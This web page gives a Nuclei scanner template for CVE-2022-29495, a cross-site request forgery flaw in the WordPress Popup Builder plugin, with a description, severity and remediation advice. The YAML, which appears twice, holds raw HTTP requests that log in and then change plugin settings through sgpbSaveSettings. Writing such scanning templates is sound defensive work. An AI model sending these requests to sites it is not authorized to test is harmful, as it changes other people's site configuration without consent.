WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery

CVE-2022-29495

Verified

Description

Sygnoos Popup Builder plugin <= 4.1.11 for WordPress contains a cross-site request forgery caused by lack of CSRF protection in plugin settings update, letting attackers change settings without authorization, exploit requires victim to visit malicious site or click malicious link.

Severity

Medium

Published Date

February 6, 2026

Template Author

shivam kamboj

CVE-2022-29495.yaml

id: CVE-2022-29495

info:
  name: WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery
  author: Shivam Kamboj
  severity: medium
  description: |
    Sygnoos Popup Builder plugin <= 4.1.11 for WordPress contains a cross-site request forgery caused by lack of CSRF protection in plugin settings update, letting attackers change settings without authorization, exploit requires victim to visit malicious site or click malicious link.
  impact: |
    Attackers can modify plugin settings without authorization, potentially leading to site defacement or malicious content injection.
  remediation: |
    Implement CSRF tokens and verify requests properly, update to the latest plugin version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29495
    - https://patchstack.com/database/vulnerability/popup-builder/wordpress-popup-builder-plugin-4-1-11-cross-site-request-forgery-csrf-leading-to-plugin-settings-update
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/popup-builder"
  tags: cve,cve2022,wordpress,wp-plugin,popup-builder,csrf,authenticated,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-post.php?action=sgpbSaveSettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sgpb-enable-debug-mode=on&sgpb-dont-delete-data=on&sgpb-disable-analytics-general=on

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "page=sgpbSettings") && contains(header, "post_type=popupbuilder")'
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Location: (.+)"
        group: 1
# digest: 4b0a00483046022100a2416e5e88d19ff6761f558c2a2efc6e3fc13244e065d3fc8d9782aa5c6808ac022100d6bddfa1e68c1a7ce971f65743dacd96f891a3530f4c76b7e3e1e488b651980d:922c64590222798bb761d5b6d8e72950

5.0Severity

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2022-29495 https://patchstack.com/database/vulnerability/popup-builder/wordpress-popup-builder-plugin-4-1-11-cross-site-request-forgery-csrf-leading-to-plugin-settings-update

Remediation Steps

Implement CSRF tokens and verify requests properly, update to the latest plugin version.

id: CVE-2022-29495

info:
  name: WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery
  author: Shivam Kamboj
  severity: medium
  description: |
    Sygnoos Popup Builder plugin <= 4.1.11 for WordPress contains a cross-site request forgery caused by lack of CSRF protection in plugin settings update, letting attackers change settings without authorization, exploit requires victim to visit malicious site or click malicious link.
  impact: |
    Attackers can modify plugin settings without authorization, potentially leading to site defacement or malicious content injection.
  remediation: |
    Implement CSRF tokens and verify requests properly, update to the latest plugin version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29495
    - https://patchstack.com/database/vulnerability/popup-builder/wordpress-popup-builder-plugin-4-1-11-cross-site-request-forgery-csrf-leading-to-plugin-settings-update
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/popup-builder"
  tags: cve,cve2022,wordpress,wp-plugin,popup-builder,csrf,authenticated,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-post.php?action=sgpbSaveSettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sgpb-enable-debug-mode=on&sgpb-dont-delete-data=on&sgpb-disable-analytics-general=on

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "page=sgpbSettings") && contains(header, "post_type=popupbuilder")'
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Location: (.+)"
        group: 1
# digest: 4b0a00483046022100a2416e5e88d19ff6761f558c2a2efc6e3fc13244e065d3fc8d9782aa5c6808ac022100d6bddfa1e68c1a7ce971f65743dacd96f891a3530f4c76b7e3e1e488b651980d:922c64590222798bb761d5b6d8e72950

WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps